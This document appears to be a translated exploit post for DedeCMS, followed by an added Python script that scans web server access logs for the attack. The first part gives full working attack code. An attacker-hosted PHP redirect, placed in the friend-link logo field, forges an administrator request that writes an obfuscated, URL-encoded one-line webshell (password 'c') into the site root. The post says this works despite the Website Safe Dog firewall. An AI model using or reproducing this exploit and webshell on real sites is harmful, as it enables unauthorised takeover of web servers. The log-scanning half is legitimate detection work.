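I first looked at WooYun-2014-65561; testing the latest version shows it has already been fixed.
That one worked by loading JS to execute. There is another method:
In the logo field, enter a PHP script that we control. This PHP script can be hosted remotely.
Contents of the go.php script: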
<?php
if($_SERVER['HTTP_REFERER']){
$baseurl = str_replace('friendlink_main.php','file_manage_control.php',$_SERVER['HTTP_REFERER']);
$baseurl .= '?fmdo=edit&filename=08.php&str=%3c%3f%70%68%70%0a%24%76%6c%6a%3d%22%4e%66%64%22%3b%0a%24%6c%75%20%3d%20%73%74%72%5f%72%65%70%6c%61%63%65%28%22%71%22%2c%22%22%2c%22%71%73%71%74%71%72%71%5f%72%65%71%70%71%6c%61%71%63%71%65%22%29%3b%0a%24%75%6b%74%3d%22%49%22%3b%0a%24%7a%73%3d%22%66%4b%66%54%73%3d%22%3b%0a%24%76%77%6e%3d%22%47%56%32%59%57%77%6f%4a%46%39%51%54%31%4e%55%57%32%22%3b%0a%24%68%79%20%3d%20%24%6c%75%28%22%72%22%2c%20%22%22%2c%20%22%62%72%61%72%73%72%65%72%36%34%72%5f%72%64%72%65%72%63%72%6f%64%72%65%22%29%3b%0a%24%70%70%6c%20%3d%20%24%6c%75%28%22%6f%71%22%2c%22%22%2c%22%6f%71%63%6f%71%72%6f%71%65%6f%71%61%74%6f%71%65%6f%71%5f%6f%71%66%75%6f%71%6e%6f%71%63%74%69%6f%71%6f%6f%71%6e%22%29%3b%0a%24%6a%66%20%3d%20%24%70%70%6c%28%27%27%2c%20%24%68%79%28%24%6c%75%28%22%66%22%2c%20%22%22%2c%20%24%75%6b%74%2e%24%76%77%6e%2e%24%76%6c%6a%2e%24%7a%73%29%29%29%3b%20%24%6a%66%28%29%3b%0a%3f%3e%0a&activepath=';
header("Location:$baseurl");
}
die;
?>
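The administrator reviews the friend link.
08.php is generated in the website root directory; the one-line webshell password is c.
Tested successfully on dedecms 20140814 with Website Safe Dog (网站安全狗) installed.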
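On the defensive side, the request this redirect produces is visible in the web server's access log. The following is an added example, not part of the original post: it scans Combined Log Format lines for GET requests to file_manage_control.php that carry fmdo=edit and str. The /dede/ path, host names and log lines are constructed, and it assumes the back end's own edit form submits by POST, so a GET-driven edit is abnormal.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
SCRIPT_EXT = (".php", ".phtml", ".php5", ".inc")

def suspicious_edit(line):
    """Return a finding for a file edit driven by a GET request, else None."""
    m = LOG_RE.match(line)
    if not m or m["method"] != "GET":
        return None  # assumption: legitimate edits arrive by POST
    url = urlsplit(m["target"])
    if not url.path.endswith("/file_manage_control.php"):
        return None
    qs = parse_qs(url.query, keep_blank_values=True)
    if qs.get("fmdo") != ["edit"] or "str" not in qs:
        return None
    name = qs.get("filename", [""])[0].lower()
    return {
        "time": m["time"], "ip": m["ip"], "status": m["status"],
        "filename": name,
        "writes_script": name.endswith(SCRIPT_EXT),  # highest priority
        "referer": m["referer"],
    }

def scan(lines):
    return [f for f in map(suspicious_edit, lines) if f]

# Constructed sample lines (not from a real server); the str value is a placeholder.
_P = '203.0.113.5 - - [14/Aug/2014:10:01:0%d +0800] "%s HTTP/1.1" 200 312 "%s" "Mozilla/5.0"'
_REF = "http://cms.example/dede/friendlink_main.php"
SAMPLE_LOG = [
    _P % (1, "GET /dede/friendlink_main.php", "-"),
    _P % (2, "GET /dede/file_manage_control.php?fmdo=edit&filename=08.php"
             "&str=PLACEHOLDER&activepath=", _REF),
    _P % (3, "POST /dede/file_manage_control.php", "http://cms.example/dede/"),
    _P % (4, "GET /dede/file_manage_control.php?fmdo=edit&filename=notes.txt"
             "&str=PLACEHOLDER&activepath=", _REF),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding whose referer is the friend link review page and whose writes_script is true matches the sequence described in the post; the file named in filename should then be checked on disk.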